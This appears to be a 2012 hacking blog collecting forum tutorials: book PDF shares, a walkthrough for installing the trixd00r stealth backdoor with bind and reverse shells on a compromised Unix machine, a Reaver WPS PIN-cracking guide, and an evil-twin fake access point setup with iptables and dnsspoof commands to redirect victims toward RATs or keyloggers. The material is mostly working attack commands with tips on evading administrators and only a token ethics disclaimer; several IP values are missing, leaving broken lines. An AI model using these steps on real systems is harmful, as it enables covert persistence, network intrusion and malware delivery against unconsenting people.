Wednesday, 10 October 2012

Books to get you going as a Pentester *PDF*

I thought I would contribute a few books that I have read that got me really interested in penetration testing, so here you go.
I'm sure there are many other great books but these are the ones I liked.
I hope everyone enjoys these books as much as I did.

They are all tested for viruses etc. Enjoy

Metasploit The PenTesters Guide:
[Image: 396-1.png]

Nmap Cook Book:
[Image: 9781449902520.jpg]

Netcat Powertools:
[Image: netcat-power-tools.jpg]

Hacking Exposed 6th Edition:
Link got removed. I will resolve this ASAP
[Image: 20164725185.jpeg]

Linux Complete Command Reference:
[Image: images?q=tbn:ANd9GcTZkK6qFeiLBlZJLNHWIPx...AB-SVd54LQ]

Linux Bible 2010:
[Image: 0470485051.MZZ.jpg]

A byte of Python:
[Image: 6762544.jpg]


- aBlackHippy

[[ TUT ]] Trixd00r *nix Backdoor Usage [[ TUT ]]

Hey what's up everybody, this is my first tutorial so bear with me.

Trixd00r is a great little tool from the guys over at nullsecurity that is a very stealthy backdoor for any *nix system. It's got a server and a client, so obviously to use this you would already have access to the box, but you need to come back later or something, so trixd00r is perfect for that.
Also, to run the server on the compromised machine you will need to either be root, or whatever user you are needs to be in the sudoers file and you need to know their password.

Alright moving on, go ahead and grab the tar file...


Untar it...

tar -zxvf trixd00r-0.0.1.tar.gz

Go to the newly created directory...

cd trixd00r-0.0.1

Okay so now we will type the command make to get some output for the installation directions, and you will get the following:

[Image: trix.png]

Okay so as you can see it gives us the option to install on quite a few different OSes; in this case I will choose Linux.

make linux

Alright so it should spit some stuff on your screen and when you do an ls command you should have some new goodies in the directory.

[Image: trix2k.png]

If you are using this on OS X, you will need to have the command line utils installed though; just go to github and get the prepackaged gcc installer if you don't have time or don't want to download Xcode, otherwise you get an error about no gmake/make being present.
Oh and if Linux complains about no gmake too, just make a symbolic link between make and gmake:

ln -s /usr/bin/make /usr/bin/gmake

The great thing about trixd00r is that the server (compromised machine) listens invisibly for "magic packets" sent from the client (attacker), and when it gets those packets it will either bind a shell on a TCP/UDP port of our choosing or connect back to us, again using either protocol.

Good job, we have the server (trixd00rd) and the client (trixd00r) ready for use. Now to the fun stuff!

Trixd00r Bind Connection
Now we need to set up our trixd00rd on the compromised machine, to do that we run sudo ./trixd00rd -H to get a list of options.

[Image: trix4.png]

A really cool feature is that you just put a ? after an option to see what it needs.

So first off the -i flag is for the interface connected to the web that we'll be using...pretty self explanatory.

And sudo ./trixd00rd -i en1 -t ? would get me...

[Image: trix5.png]

The default is the TCP SYN packet, which I'm just going to leave as is. The other protocols are the same process as this one; I'll leave it up to you to play with them and discover why one would be more advantageous than the others, depending on the situation.
If you don't know the different protocols and how they work, I recommend reading up on them, because they're just good to know. Not understanding even basic TCP/IP (I'm no expert) is just ignorant, especially when it's fun to learn about, and hacking/pentesting and information security have so much to do with it.

The -s flag is which shell mode we want to use; again I used a ? to see the different modes. In this case we are using the TCP Bind option, which is -s 0

[Image: trix34.png]

Alright the two options above (-t and -s) are the most important, so I will show you the rest of the options I used, a picture and then explain them below.

sudo ./trixd00rd -i en1 -t 0 -s 0 -b <port> -v

[Image: trix88.png]

-b 2302 This is the port that our listener will be bound to, waiting for the magic packet to give us our shell. The default is 31337, which comes up as "Elite" on a port scan, so if the admin, or user, or whoever runs a scan because he's security minded, he will see that port open, which is known to be a trojan/backdoor/RAT/etc., so I always change my backdoor ports to something that is a game app or some obscure port that has nothing to do with any of the above - out of sight, out of mind.
^^^The only time this will come up on a port scan is when you are actually interacting with trixd00rd; any other time it will just show up as closed, or filtered, to an outsider - that's why this is so stealthy!

-v The -v option is for verbosity. I like to see output to know what is going on, and if something goes wrong it will say so in plain English.

Our server is waiting for the magic packets, so now we go to our client and interact with the shell!

./trixd00r -h <target IP> -t 0 -s 0 -p <port> -m <passphrase> -v

[Image: trix87.png]

-h This tells trixd00r where to send the packet to get our shell.

-t 0 and -s 0 have to match up with trixd00rd - for obvious reasons.

-p 2302 This tells trixd00r which port the server is listening on.

-v Again, verbosity.

And we're done. If all went well, you'll get a nice welcome banner like the one below, and a prompt waiting for input!

[Image: trix12.png]

Trixd00r Reverse Connection

Now everything is pretty much the same as above except a few options, so instead of explaining everything I will just show you the commands, a picture and explain the options that changed.

For the server, we will drop the -b <port> option and add the -c <connect back host IP> and change the -s from 0 to 1 (indicating we want a reverse connection instead of a bind shell) like so.

sudo ./trixd00rd -i en1 -t 0 -s 1 -c <connect back IP> -v

[Image: trix66.png]

For the client, we do the same as above, except there is no need for a -c option because the server is connecting back to us.

./trixd00r -h <target IP> -t 0 -s 1 -v

[Image: trix100.png]

Voila, perfect reverse shell connection.

Closing the Connection

To COMPLETELY close the connection we use control+C on the client and then add -m byebye and hit enter, it will tell you that it sent the magic packet which means the connection was closed and now the server is NOT listening anymore.
[Image: bybye.png]

Server side if you send the byebye packet it will look like this...
[Image: trix14.png]

To keep the server listening on the compromised machine so you can come back later, just hit control+C on the client but do not send the byebye packet.


Aight, that's it, hope you enjoyed the tutorial! All credits go to for making trixd00r and also to their YouTube video, where I got all the info to make this.

I'm not an expert with this tool, although it's not like it's really complicated, but if you have any questions about it I'm glad to help...also lemme know how you liked the tutorial.

Thanks for reading, and have a good day.

CompTIA Security+ Deluxe Study Guide Free Download

[Image: ibyqi4cdpLcu9.jpg]

I have been studying for this certification exam and this book has been very useful. This isn't a one-stop shop for this exam. They encourage you to learn more than what this book teaches, but I wanted to share this with anyone who wants to study for the exam or just read some useful information.

Table Of Contents
Chapter 1: General Security Concepts.
Chapter 2: Identifying Potential Risks.
Chapter 3: Infrastructure and Connectivity.
Chapter 4: Monitoring Activity and Intrusion Detection.
Chapter 5: Implementing and Maintaining a Secure Network.
Chapter 6: Securing the Network and Environment.
Chapter 7: Cryptography Basics, Methods, and Standards.
Chapter 8: Security Policies and Procedures.
Chapter 9: Security Administration.

Please reply here to keep this thread alive. Thanks

Tuesday, 2 October 2012

WPS (Wifi Protected Setup) is a feature created in 2007 to make Wifi Protected Networking easy for the average user while keeping it secure. However, due to a design flaw in the authentication of the device's PIN, it is possible to crack the PIN on a WPS-enabled AP. This has nothing to do with cracking the WPA/WPA2 PSK, although the PSK will be obtained with this method.

The PIN is broken down as 11112223 (an example for explanation only, not to be taken literally).
The 1111 is the first half of the PIN. The 222 is the second half of the PIN. The 3 is a checksum of the entire PIN (the first 7 digits). Reaver must first obtain the first half of the PIN (1111) before it can go on to the second half (222). When reaver is running you will notice that 1111 changes, 222 remains the same and 3 changes, until it obtains the first half of the PIN. Then 1111 remains the same while 222 and 3 change as it obtains the second half of the PIN.

Tools needed
Linux distro (I recommend BackTrack 5r1)
A compatible WiFi adapter (research your preference, e.g. AWUS036H)
NB: Reaver will only run on Linux, which is why BackTrack 5r1 is recommended.

With BackTrack running, download Reaver, then extract and install reaver as follows from a terminal:
tar xvfz reaver1.xxxx (xxxx being the release number which will change with updates)
cd /src/
make install

Assuming no errors, let's continue.
Open a fresh terminal, let's get the adapter running in promiscuous mode, and type the following:

airmon-ng (this will list your wifi adapters, most common is wlan0)
airmon-ng start wlan0 (replace wlan0 with the one you get listed)
You should receive output that tells you which interface is in monitor mode, most commonly mon0.

Now in the same terminal let's see who is around; type the following:
airodump-ng --encrypt wpa mon0 (this will display only WPA/WPA2 encrypted networks. Let it run for 30 sec or so till you see all the APs that you can, then hit CTRL+C.)

APs should be listed by power, so you want to start with the top ones and work your way down the list. But wait... how do I know if WPS is enabled? Glad you asked.

Open a new terminal and type the following:
walsh -i mon0 (replace mon0 as noted above. This will scan for all WPS-enabled APs in range and remove the guesswork; compare it to the airodump-ng output and pick out the highest-powered AP first.)

Now we are ready to start. Go back to the terminal that you installed reaver in and type the following:

reaver -i mon0 -b BSSID -S -vv (Change mon0 as noted previously. BSSID is the MAC address of the AP. You can use the MAC from the walsh output or the airodump-ng output, as they will be the same. The -S switch reduces the packet size sent to the AP and thereby decreases the attack time. The -vv switch will display all errors and PINs tested.)

Now just let it run.

You may see the percentage in reaver's output jump from 2% to 90% just like that. This is normal when it finds the first half of the PIN. This is also why, as noted above, the second half of the PIN (222) remains constant until it finds the first half.

Errors are a common thing to see and are caused by many variables:
WARNING: Receive timeout occurred
WARNING: 10 failed connections in a row
WARNING: Out of order packet received, re-trasmitting last message
Just let it run.

Tired of cracking WEP? Tired of WPA and countless hours of dictionary attacks? Then it's time to be sexy. YOU need to be sexy. And I'll show you how.

Here's the deal: how would you like to create a fake access point named, say, Wifi Hotspot, and have people connect to YOU? From there, you can mess around with them, DNS spoof them to websites, or even to your own web server, convincing them to download your RAT/keylogger. Or how about monitoring all their websites and network traffic? I won't show you all of this, but I'll show you some.

First off, I would like to give a huge shoutout to member proxx8187. He helped me a great deal diagnosing problems in the making of this tutorial. Some of you may recognize him as the encyclopedia giving answers to all of your incessant questions ;) Another big shoutout goes to SpyFi. He inspired me to pursue this area and thus the creation of this tutorial. Some may recognize him as the genius behind many great tutorials all around HF, as well as his Android hacking threads. Another member who helped to diagnose problems was GeeMann. He's amazing and one of the highest quality users I've seen around the HF wireless section. In case you didn't know, he's the mastermind behind our WPS cracking tutorial. I also would like to thank CapitalS for helping me out too in the creation of this tutorial. This was made mostly by me, but would have been impossible without the help of these four great members!

Now the tutorial!! This is for educational purposes only. Please stay ethical with this and always get permission before you do something. I know you will ignore my plea for righteousness, but really, stay ethical. It will pay off in the long term! Now, let me give a brief overview of what we are going to accomplish here. We will create a fake access point with whatever name you like, and provide any person that connects to it with internet access, so they will think they are on a legitimate access point! Then from there, we can do many things to the client.

1. Two wireless interfaces. (An external USB wifi adapter, plus your internal wifi laptop adapter) A good external wifi adapter is the ALFA AWUS036H. It's the one I use. You can get one for about 25 dollars on Amazon.
2. Backtrack 5 R2 (R1 should work, but this was tested on R2)
3. A brain please.


We need to update Backtrack and then install the dhcp3 server.

apt-get update && apt-get upgrade && apt-get dist-upgrade

apt-get install dhcp3-server

Cool, we got all the stuff we need! We are ready to begin our attack. Please make sure that your laptop interface (should be wlan0) is connected to your own router. Make sure that your external interface is plugged in and ready to go (this one should be wlan1).


We must begin the process of configuring our dhcp3 server so that our clients will receive an IP address when they connect. I expect your laptop interface to be connected to your router right now, and the external interface plugged in but not connected to any router, so we will run a check to determine our DNS address.

cat /etc/resolv.conf

See that IP address printed after "nameserver"? That's the DNS address. Please take note of it. In the soon following code, we will replace $dns with the DNS address you saw in the previous command.

gedit /etc/dhcp3/dhcpd.conf

If you are using Backtrack 5 KDE version, type this instead:

kwrite /etc/dhcp3/dhcpd.conf

If kwrite doesn't work, replace it with kate.

Now we have a text editor open with some text in it. Delete everything you see, and replace it with this:

ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet netmask {
option subnet-mask;
option broadcast-address;
option routers;
option domain-name-servers $dns;
}

Remember to replace $dns with your DNS address you learned earlier!!! So a possible line will look like this:

option domain-name-servers;


Let's configure our wireless interfaces, shall we? We need to put our external interface into monitor mode. If you don't know the names of your interfaces, type "ifconfig" without quotes, and it will show you. In my situation, the external interface is wlan1, so just replace that with YOUR external interface.

airmon-ng start wlan1

airbase-ng -e "NAME OF ACCESS POINT HERE" -c 9 mon0

Now open a new terminal and type the following code which will set up our fake access point along with the dhcp3 server. Be sure to enter each command separately.

ifconfig at0 up
ifconfig at0 netmask
route add -net netmask gw
mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
echo > '/var/lib/dhcp3/dhcpd.leases'
dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/ at0

You should now have two terminals running. One with airbase-ng maintaining your fake access point, and another with the dhcp3 server open. We now need to set up our iptables to let our clients gain internet access.


Your laptop interface should be connected to your router!! I am assuming your laptop interface is wlan0, but if not, type ifconfig to see which one it is. If you don't know what it is, you should close out of this tutorial. There are some variables in this next code you will need to replace yourself. I will tell you how and which.

We need to find your gateway address. Type the following into a new terminal:

route | grep "default"

See that IP address next to "default"? That is your gateway IP address, and you should take note of it. It should, in most cases, be the same as your DNS address. Remember your laptop interface? It should be wlan0, if not, you should know what it is. In the following code, replace $interface with your laptop interface, and $gateway with your gateway IP address. Be sure to enter each command separately (yes a lot of copy and pasting).

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface $interface -j MASQUERADE
iptables -A INPUT -i [+] -j ACCEPT
iptables -A OUTPUT -o [+] -j ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gateway

Congratulations!!! You have set up a fake access point with WORKING internet connection. Go ahead, give it a try using another computer and connect to your access point!


Now that our client(s) are connected to YOU, you can do whatever you want to them! One of my favorites is the use of DNS spoofing. While your clients are connected to you, you can redirect whatever website they visit to whatever website you want them to go to. Or, even better, you can redirect them to your own web server on your computer, which could convince them to download a RAT or keylogger.

I will show you how to perform a simple DNS spoofing attack on your client. Create a file in your ROOT folder named spoof. Enter the following text into that file.

Code: *

Now we initiate the DNS spoofing attack. This will redirect every website our client visits to YOU. So if you are running your own web server on your computer, they will be redirected to that web server. This is great for Java Applet attacks and other Social Engineering Toolkit stuff! Use the search option at the top of this website to find out more.

dnsspoof -i at0 -f /root/spoof

There, now every website they visit will be redirected back to your own web server! Note, if you want this attack to be more flexible, edit the spoof file you created earlier. is the IP address you want to redirect them to. The parameter after that is the website you want to be redirected. For example, if I want to redirect my client's requests for to, I would enter the following in my spoof file.


Here, is the IP address of You can find the IP address of websites by pinging them in the terminal.


This is the end of my tutorial. I hope you found it informative, as well as a fresh new way of performing wireless attacks. There are myriad ways you can leverage this attack to perform all sorts of man-in-the-middle attacks, but I leave that up to you to research. I did the hard part for you, so now it's up to you to figure out the rest! Please say thanks!